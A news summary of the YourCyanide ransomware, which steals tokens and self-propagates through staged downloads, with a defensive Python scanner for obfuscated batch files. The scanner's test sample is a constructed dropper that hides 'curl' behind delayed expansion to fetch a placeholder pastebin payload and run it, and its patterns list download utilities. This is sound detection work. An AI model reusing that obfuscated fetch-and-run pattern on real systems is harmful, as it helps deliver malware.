"YourCyanide Ransomware Propagates With PasteBin, Discord, Microsoft Links"

A new CMD-based ransomware variant is still under development, but researchers at Trend Micro warn that its combination of multiple layers of obfuscation and its integration of links to legitimate services into the attack chain make it a potentially formidable threat. YourCyanide traces its roots to the GonnaCope ransomware family, first discovered in April. The researchers note that it does not yet encrypt anything (they expect that to come soon), but it does rename all targeted files, steal information, and pilfer access tokens from popular applications such as Chrome, Discord, and Microsoft Edge. It also self-propagates. According to the researchers, YourCyanide includes a few new tactics, including the use of PasteBin, Discord, and Microsoft links to download its payload in stages, and it now hides behind the CMD interpreter's Enable Delayed Expansion functionality. The researchers note that while YourCyanide and its related variants are currently not as impactful as other families, they represent an interesting update to ransomware kits by bundling a worm, ransomware, and an information stealer into a single mid-tier ransomware framework. They also consider it likely that these variants are still in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage.
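Two of the traits above, commands hidden behind delayed variable expansion and a payload fetched in stages from legitimate hosting services, are visible in a batch script before it ever runs. The following scanner is an added, defender-side example; it is not code from Trend Micro or Dark Reading, and it uses no YourCyanide artifacts. The service hostnames are the generic public ones, the regex heuristics, thresholds and the `SAMPLE_SCRIPT` it is run against are constructed for illustration (the URL is a placeholder), and `resolve_delayed` shows why this obfuscation is weak against static triage: the `!var!` fragments can be re-joined from the script's own `set` lines.

```python
"""Static triage of a .bat/.cmd file for the two YourCyanide traits the
summary names: commands hidden behind delayed variable expansion, and staged
payload download from legitimate hosting services. Added defender-side
example; not code from Trend Micro or Dark Reading."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import List

# Services the summary says are abused for staged delivery. Generic public
# hostnames only; the malware's real URLs are not on the page.
STAGING_HOSTS = ("pastebin.com", "discord.com", "discordapp.com")
# Built-in or common Windows utilities a batch script can use to fetch a stage.
DOWNLOADERS = ("curl", "certutil", "bitsadmin", "powershell", "wget")

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s\"'<>]*")
DELAYED_RE = re.compile(r"setlocal\s+enabledelayedexpansion", re.I)
BANG_VAR_RE = re.compile(r"!([A-Za-z_]\w*)!")          # !name! run-time expansion
SET_RE = re.compile(r'^\s*set\s+"?([A-Za-z_]\w*)=(.*?)"?\s*$', re.I | re.M)
DOWNLOADER_RE = re.compile(r"\b(" + "|".join(DOWNLOADERS) + r")\b", re.I)


@dataclass
class Finding:
    indicator: str
    detail: str


def resolve_delayed(text: str, max_rounds: int = 5) -> str:
    """Expand !var! references using the script's own `set` lines, so a
    command spelled out as fragments (e.g. !a!!b! -> curl) becomes visible."""
    env = {name.lower(): value for name, value in SET_RE.findall(text)}
    for _ in range(max_rounds):  # bounded: handles nesting, avoids loops
        expanded = BANG_VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), text)
        if expanded == text:
            break
        text = expanded
    return text


def _is_staging_host(host: str) -> bool:
    return any(host == h or host.endswith("." + h) for h in STAGING_HOSTS)


def scan_batch(text: str) -> List[Finding]:
    findings: List[Finding] = []

    # 1. Delayed-expansion obfuscation: many 1-3 character fragments glued
    #    together through !var! references under EnableDelayedExpansion.
    fragments = [v for _, v in SET_RE.findall(text) if len(v) <= 3]
    expansions = BANG_VAR_RE.findall(text)
    if DELAYED_RE.search(text) and len(fragments) >= 3 and len(expansions) >= 3:
        findings.append(Finding(
            "delayed_expansion",
            f"{len(fragments)} short fragments reassembled via {len(expansions)} !var! expansions"))

    resolved = resolve_delayed(text)

    # 2. URLs pointing at the hosting services used for staged delivery.
    staging_urls = {m.group(0) for m in URL_RE.finditer(resolved)
                    if _is_staging_host(m.group(1).lower())}
    for url in sorted(staging_urls):
        findings.append(Finding("staging_host", url))

    # 3. Download utilities, including ones that only appear after expansion.
    visible = {t.lower() for t in DOWNLOADER_RE.findall(text)}
    for tool in sorted({t.lower() for t in DOWNLOADER_RE.findall(resolved)}):
        how = "in clear text" if tool in visible else "assembled at run time by delayed expansion"
        findings.append(Finding("downloader", f"{tool} ({how})"))

    # 4. The combination is the staged-download pattern itself.
    kinds = {f.indicator for f in findings}
    if "staging_host" in kinds and "downloader" in kinds:
        findings.append(Finding("staged_download", "download utility plus staging-service URL"))
    return findings


def risk_level(findings: List[Finding]) -> str:
    kinds = {f.indicator for f in findings}
    if "staged_download" in kinds:
        return "high"
    if kinds & {"delayed_expansion", "staging_host"}:
        return "medium"
    return "low"


# Constructed, non-functional stand-in for a staged dropper (placeholder URL);
# it is not a sample of YourCyanide.
SAMPLE_SCRIPT = r"""@echo off
setlocal EnableDelayedExpansion
set "a=cu"
set "b=rl"
set "c=-o"
set "e=ca"
set "f=ll"
set "d=%TEMP%\s2.bat"
set "u=https://pastebin.com/raw/EXAMPLE"
!a!!b! !u! !c! !d!
!e!!f! !d!
"""

if __name__ == "__main__":
    found = scan_batch(SAMPLE_SCRIPT)
    for f in found:
        print(f"[{f.indicator}] {f.detail}")
    print("risk:", risk_level(found))
```

Run on the constructed sample, the scanner reports the five two-character fragments joined through eight `!var!` expansions, the pastebin.com URL, and a `curl` that never appears in the file as written but does once the fragments are resolved; together those raise the script to the "high" tier. The same resolution step is what to apply to a batch file quarantined from an endpoint before deciding whether the URLs it carries need blocking.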


Dark Reading reports: "YourCyanide Ransomware Propagates With PasteBin, Discord, Microsoft Links"
